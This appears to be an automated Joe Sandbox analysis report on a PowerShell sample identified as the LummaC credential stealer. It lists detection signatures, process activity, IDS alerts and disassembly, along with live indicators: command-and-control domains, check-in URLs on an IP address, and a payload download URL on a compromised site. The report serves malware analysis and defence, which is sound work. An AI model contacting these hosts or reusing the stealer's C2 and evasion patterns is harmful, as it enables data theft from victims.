Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
get_txt.ps1

Overview

General Information

Sample name:get_txt.ps1
Analysis ID:1617749
MD5:f25c7e9b98323f2f5347a8d11175130e
SHA1:e41c6b2970bbd531da88b1f289ee659204219a32
SHA256:99e4a0db55e1dc5a83ec18db0daf104104423abd277e568b6324be4da1c1ec27
Tags:91-206-178-120ps1user-JAMESWT_MHT
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • powershell.exe (PID: 4904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6128 cmdline: "C:\Windows\Temp\cmd.exe" MD5: 6D5CEBDE81333A9A52AF275D3BCA0997)
  • notepad.exe (PID: 2444 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\get_txt.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
{"C2 url": ["healthyjouprney.tech", "nestlecompany.world", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "YJ1g2y--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Windows\Temp\cmd.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        0000000A.00000003.2043952153.0000000000C12000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000A.00000003.2044239981.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000A.00000003.1899525334.0000000000C50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                0000000A.00000000.1382205168.0000000000401000.00000020.00000001.01000000.0000000B.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  Click to see the 4 entries
                  SourceRuleDescriptionAuthorStrings
                  10.3.cmd.exe.c50000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                    10.2.cmd.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                      10.3.cmd.exe.c50000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                        10.0.cmd.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                          System Summary

                          barindex
                          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 344, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", ProcessId: 4904, ProcessName: powershell.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 344, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\get_txt.ps1", ProcessId: 4904, ProcessName: powershell.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-18T08:30:25.987634+010020283713Unknown Traffic192.168.2.749974188.114.97.3443TCP
                          2025-02-18T08:30:26.959819+010020283713Unknown Traffic192.168.2.749975188.114.97.3443TCP
                          2025-02-18T08:30:28.719659+010020283713Unknown Traffic192.168.2.749976188.114.97.3443TCP
                          2025-02-18T08:30:36.417594+010020283713Unknown Traffic192.168.2.749977188.114.97.3443TCP
                          2025-02-18T08:30:37.958391+010020283713Unknown Traffic192.168.2.749978188.114.97.3443TCP
                          2025-02-18T08:30:39.474358+010020283713Unknown Traffic192.168.2.749979188.114.97.3443TCP
                          2025-02-18T08:30:41.751362+010020283713Unknown Traffic192.168.2.749980188.114.97.3443TCP
                          2025-02-18T08:30:44.008622+010020283713Unknown Traffic192.168.2.749981188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-18T08:29:24.779520+010020216971A Network Trojan was detected192.168.2.74970235.208.212.94443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-18T08:30:26.454750+010020546531A Network Trojan was detected192.168.2.749974188.114.97.3443TCP
                          2025-02-18T08:30:27.315608+010020546531A Network Trojan was detected192.168.2.749975188.114.97.3443TCP
                          2025-02-18T08:30:44.485010+010020546531A Network Trojan was detected192.168.2.749981188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-18T08:30:26.454750+010020498361A Network Trojan was detected192.168.2.749974188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-18T08:30:39.927272+010020480941Malware Command and Control Activity Detected192.168.2.749979188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-18T08:29:33.430247+010028032742Potentially Bad Traffic192.168.2.74974991.206.178.1205001TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-18T08:29:23.794974+010028602321Malware Command and Control Activity Detected192.168.2.74970191.206.178.1205001TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-18T08:29:23.794995+010028602331Malware Command and Control Activity Detected91.206.178.1205001192.168.2.749701TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-18T08:29:24.821515+010018100032Potentially Bad Traffic35.208.212.94443192.168.2.749702TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-02-18T08:29:21.073809+010018100002Potentially Bad Traffic192.168.2.749700104.26.13.20580TCP
                          2025-02-18T08:29:23.794974+010018100002Potentially Bad Traffic192.168.2.74970191.206.178.1205001TCP
                          2025-02-18T08:29:24.779520+010018100002Potentially Bad Traffic192.168.2.74970235.208.212.94443TCP
                          2025-02-18T08:29:33.430247+010018100002Potentially Bad Traffic192.168.2.74974991.206.178.1205001TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: http://91.206.178.120:5001/script_end?random_number=$randomNumberAvira URL Cloud: Label: malware
                          Source: https://sandramosquedamx.com/wp-content/plugins/newsletter/images/gtyh.exeAvira URL Cloud: Label: malware
                          Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&mAvira URL Cloud: Label: malware
                          Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=MicrosoftAvira URL Cloud: Label: malware
                          Source: http://91.206.178.120:5001/script_end?random_number=Avira URL Cloud: Label: malware
                          Source: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$raAvira URL Cloud: Label: malware
                          Source: http://91.206.178.120:5001Avira URL Cloud: Label: malware
                          Source: http://91.206.178.120:5001/script_start?ip=Avira URL Cloud: Label: malware
                          Source: http://91.206.178.120:5001/script_end?random_number=29634$MAvira URL Cloud: Label: malware
                          Source: http://91.206.178.120:5001/script_end?random_number=29634Avira URL Cloud: Label: malware
                          Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=29634Avira URL Cloud: Label: malware
                          Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["healthyjouprney.tech", "nestlecompany.world", "mercharena.biz", "generalmills.pro", "stormlegue.com", "blast-hubs.com", "blastikcn.com", "nestlecompany.pro"], "Build id": "YJ1g2y--"}
                          Source: C:\Windows\Temp\cmd.exeReversingLabs: Detection: 13%
                          Source: get_txt.ps1Virustotal: Detection: 13%Perma Link
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                          Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmpString decryptor: healthyjouprney.tech
                          Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmpString decryptor: nestlecompany.world
                          Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmpString decryptor: mercharena.biz
                          Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmpString decryptor: generalmills.pro
                          Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmpString decryptor: stormlegue.com
                          Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmpString decryptor: blast-hubs.com
                          Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmpString decryptor: blastikcn.com
                          Source: 0000000A.00000002.2101328633.0000000000400000.00000040.00000001.01000000.0000000B.sdmpString decryptor: nestlecompany.pro
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_004197EB CryptUnprotectData,10_2_004197EB

                          Compliance

                          barindex
                          Source: C:\Windows\Temp\cmd.exeUnpacked PE file: 10.2.cmd.exe.400000.0.unpack
                          Source: unknownHTTPS traffic detected: 35.208.212.94:443 -> 192.168.2.7:49702 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49974 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49975 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49976 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49977 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49978 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49979 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49980 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49981 version: TLS 1.2
                          Source: Binary string: wntdll.pdbUGP source: cmd.exe, 0000000A.00000002.2105022211.00000000027F0000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: wntdll.pdb source: cmd.exe, 0000000A.00000002.2105022211.00000000027F0000.00000040.00001000.00020000.00000000.sdmp
                          Source: C:\Windows\Temp\cmd.exeCode function: 10_2_02653ECD lstrcpyW,lstrcpyW,lstrcatW,FindFirstFileW,PathRemoveFileSpecW,lstrcatW,lstrcmpW,lstrcmpW,lstrcatW,CreateDirectoryW,lstrcatW,lstrcatW,lstrcatW,PathRemoveFileSpecW,PathRemoveFileSpecW,lstrcatW,PathRemoveFileSpecW,PathRemoveFileSpecW,lstrcatW,lstrcatW,CopyFileExW,lstrcpyW,lstrcatW,lstrcpyW,lstrcatW,FindNextFileW,FindClose,10_2_02653ECD
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h10_2_00419070
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov word ptr [eax], cx10_2_0042977A
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then lea eax, dword ptr [esp+000002D4h]10_2_004197EB
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-000000EBh]10_2_00443790
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then cmp word ptr [edi+eax], 0000h10_2_00425BA0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx edx, byte ptr [ebx+eax-5BFBFFF6h]10_2_00412C13
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx-000000AAh]10_2_0040FFF0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [esi], cl10_2_00433FF6
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ebx, byte ptr [edx]10_2_0043D0C0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov ecx, eax10_2_0042B120
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov word ptr [edi], cx10_2_00427130
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov ebp, eax10_2_004471E0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]10_2_004301F0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h10_2_0041B26C
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]10_2_0040A2D0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]10_2_0040A2D0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov edi, dword ptr [esp+20h]10_2_00410280
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then push eax10_2_0044529F
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [esi], cl10_2_0043430A
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [esi], al10_2_0043430A
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [edi], bl10_2_0040C310
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [esi], cl10_2_004343C2
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [esi], al10_2_004343C2
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+50h]10_2_0042C388
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [esi], cl10_2_004343B2
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [esi], al10_2_004343B2
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov ecx, eax10_2_00432479
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]10_2_0041E4A0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h10_2_0041E4A0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5Ch]10_2_0041E4A0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]10_2_0041E4A0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]10_2_0041E4A0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h10_2_0041E4A0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov ecx, eax10_2_0042F6A0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h10_2_00431720
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx edx, byte ptr [ecx+esi]10_2_004027C0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx esi, word ptr [ecx]10_2_0041D7BF
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx edx, word ptr [ecx]10_2_0041D7BF
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]10_2_0042C870
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+47h]10_2_0042C870
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov dword ptr [esi+eax], 00000000h10_2_0042C870
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 6E74889Ah10_2_004128D3
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 6E74889Ah10_2_004128D3
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]10_2_0040A8F0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+021D28A5h]10_2_0042C890
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then lea eax, dword ptr [esp+000002D4h]10_2_0041989B
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov esi, edx10_2_0041A94D
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]10_2_00423960
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov ecx, eax10_2_0043297D
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [esi], cl10_2_00432917
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [esi], al10_2_00432917
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000174h]10_2_004349C6
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov edx, ecx10_2_004439E0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov ecx, eax10_2_004323F9
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then lea ecx, dword ptr [eax+eax]10_2_0040CA50
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov edx, ecx10_2_0040CA50
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-000000C0h]10_2_0042EA60
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then push eax10_2_00410A76
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [eax], bl10_2_00410A76
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, word ptr [esi]10_2_00446AE0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-000000C0h]10_2_0042EA60
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+200415BEh]10_2_0041FC5E
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov esi, eax10_2_00445515
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov ecx, eax10_2_0042ACF4
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]10_2_00426CA0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-035FA4E5h]10_2_00426CA0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov ecx, eax10_2_0042ACAC
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+3949D1B0h]10_2_0040DD03
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov edx, esi10_2_00434DE3
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov edx, esi10_2_00434DE3
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]10_2_00443DB0
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov ebp, eax10_2_00446DB9
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+04h]10_2_00443E50
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov ebp, eax10_2_00446E30
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov word ptr [eax], cx10_2_0041AECF
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+54h]10_2_00432ECD
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+40C27F55h]10_2_00419ED9
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov dword ptr [esp+0000009Ch], 00000000h10_2_0041CE95
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then mov byte ptr [eax], cl10_2_0041BF01
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 61A44046h10_2_0041BF17
                          Source: C:\Windows\Temp\cmd.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]10_2_00418FB0

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2860232 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) : 192.168.2.7:49701 -> 91.206.178.120:5001
                          Source: Network trafficSuricata IDS: 2860233 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) : 91.206.178.120:5001 -> 192.168.2.7:49701
                          Source: Network trafficSuricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.2.7:49702 -> 35.208.212.94:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49981 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49979 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49975 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49974 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49974 -> 188.114.97.3:443
                          Source: Malware configuration extractorURLs: healthyjouprney.tech
                          Source: Malware configuration extractorURLs: nestlecompany.world
                          Source: Malware configuration extractorURLs: mercharena.biz
                          Source: Malware configuration extractorURLs: generalmills.pro
                          Source: Malware configuration extractorURLs: stormlegue.com
                          Source: Malware configuration extractorURLs: blast-hubs.com
                          Source: Malware configuration extractorURLs: blastikcn.com
                          Source: Malware configuration extractorURLs: nestlecompany.pro
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 5001
                          Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49701
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 5001
                          Source: unknownNetwork traffic detected: HTTP traffic on port 5001 -> 49749
                          Source: global trafficTCP traffic: 192.168.2.7:49701 -> 91.206.178.120:5001
                          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                          Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                          Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
                          Source: Joe Sandbox ViewASN Name: ARTNET2PL ARTNET2PL
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: unknownDNS query: name: api.ipify.org
                          Source: unknownDNS query: name: api.ipify.org
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49701 -> 91.206.178.120:5001
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49700 -> 104.26.13.205:80
                          Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49749 -> 91.206.178.120:5001
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49749 -> 91.206.178.120:5001
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49976 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49975 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49978 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49977 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49974 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49979 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49981 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49980 -> 188.114.97.3:443
